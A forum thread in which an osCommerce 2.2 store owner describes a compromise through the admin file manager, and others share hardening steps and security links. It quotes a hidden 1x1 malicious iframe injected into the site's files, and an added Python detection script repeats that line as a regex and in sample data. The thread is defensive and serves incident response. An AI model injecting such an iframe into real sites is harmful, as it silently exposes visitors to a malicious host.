
osCommerce site hacked via injection


protogabe


One of my sites, an osCommerce 2.2 site that gets pretty heavy traffic, was hacked to pieces yesterday. The client first complained that they could no longer update their inventory, and reported a rather odd error. Later in the day it was reported that new products could not be added at all. I checked the server files and noticed files modified on Jan 22nd. I searched the files and noticed they were all cut off at random points and this line was injected:

 

<iframe src="http://merrychristmasdude.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

 

What scares us the most is that even files in the root folder before public_html were altered and injected with that. Reviewing logs, I was able to find the IP and referrer URL, and it turns out there was a direct call to the catalog/admin/file-manager.php file from the IP in question (out of Santa Monica, California).

 

Our admin side of the site is protected by .htpasswd, so I wonder if the password had been compromised and used to gather info -- no one had the password but me and the site owner, who hadn't given it out. My question is how the hell did anyone get access to the files, and/or has anyone ever seen this?

 

Thanks,

ProtoGabe

www.protoactive.com


Thanks, Jack. Looks like exactly what I am experiencing. Just to reprint the best advice from that thread here so it's easier to query:

 

Your ongoing problem is - how did they get the code into the site in the first place?

 

I cross-indexed file mod dates with access logs and found the IP of the offender, ran a traceroute and tracked it to Santa Monica, California. We're in New York, so it wasn't a local attack. How they got the passwords is still a big question mark, but according to the logs they directly accessed file-manager.php in admin, and that's it, no other activity logged, which tells me it was not human, because a human would fuss around on other pages. Is this a plausible theory?

 

Here's the advice from Jack's thread I am doing as we speak, and always remember to BACKUP, if this happens to you:

 

Until you know that, they'll be able to do it again and your work will be wasted.

 

1. Change all user names and passwords, including the db user (don't forget the configure.php file entries).

 

2. Make sure your site uses at least osCommerce 2.2 MS2 (060817), and if it doesn't then upgrade.

 

3. Make sure that no folder has permissions above 755. If your hosting requires permissions of 777 on folders then move hosting.

 

4. Delete the filemanager.php file from your osCommerce admin panel.

 

5. Rename the 'admin' folder to something unique (not 'admin2' or 'newadmin'), and then change the entries for /admin/ in admin/includes/configure.php to /new_name/

 

6. Password-protect the renamed 'admin' folder with a new user and password.

 

7. Run a full virus scan, Malware and SpyBot scan on your PC and any PC which is used to FTP files to the site - as this may be the source of the injection.

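A check for the two things this post describes, added here as an example and not code from the thread or from osCommerce: it walks a site tree looking for the 1x1 iframe injection quoted in the first post and for any folder with permissions above 755 (step 3). The sample tree, file names and the 777 images folder are constructed for the demo; on a real site you would point scan_tree at the web root.

```python
import os
import re
import stat
import tempfile

# The 1x1 iframe injection quoted in the first post; the domain is the one reported
# there, and any alt value is accepted since that part is likely to vary.
INJECT_RE = re.compile(
    rb'<iframe\s+src="http://merrychristmasdude\.com/[^"]*"\s+width="1"\s+height="1"',
    re.IGNORECASE,
)
MAX_DIR_MODE = 0o755  # step 3 of the advice: no folder above 755


def scan_tree(root, max_dir_mode=MAX_DIR_MODE):
    """Return (infected_files, loose_dirs), both as paths relative to root."""
    infected, loose = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        mode = stat.S_IMODE(os.stat(dirpath).st_mode)
        if mode & ~max_dir_mode:  # any bit 755 does not grant, e.g. group/world write
            loose.append((os.path.relpath(dirpath, root), oct(mode)))
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:  # binary read: injected files were truncated mid-byte
                if INJECT_RE.search(fh.read()):
                    infected.append(os.path.relpath(path, root))
    return sorted(infected), sorted(loose)


def build_sample_site():
    """Constructed demo tree: one clean PHP file, one cut off and injected, one 777 folder."""
    root = tempfile.mkdtemp(prefix="osc_demo_")
    catalog = os.path.join(root, "catalog")
    os.makedirs(os.path.join(catalog, "images"))
    os.chmod(catalog, 0o755)                          # within the limit
    os.chmod(os.path.join(catalog, "images"), 0o777)  # the kind of folder step 3 warns about
    with open(os.path.join(catalog, "index.php"), "w") as fh:
        fh.write("<?php require('includes/application_top.php'); ?>\n")
    with open(os.path.join(catalog, "product_info.php"), "w") as fh:
        fh.write('<?php require("includes/applica'  # cut off at a random point, as reported
                 '<iframe src="http://merrychristmasdude.com/ind.php" width="1" '
                 'height="1" alt="Uw8bLlKjsi3HqXs"></iframe>')
    return root


if __name__ == "__main__":
    infected, loose = scan_tree(build_sample_site())
    print("injected files:", infected)  # ['catalog/product_info.php']
    print("dirs above 755:", loose)     # [('catalog/images', '0o777')]
```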


Even though this is a long time after the fact, oddly enough, searching Google for results on osCommerce hacks, this discussion is almost near the top so I thought it best to place this link here to the discussion of how to secure your v2.2 range of osCommerce websites.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
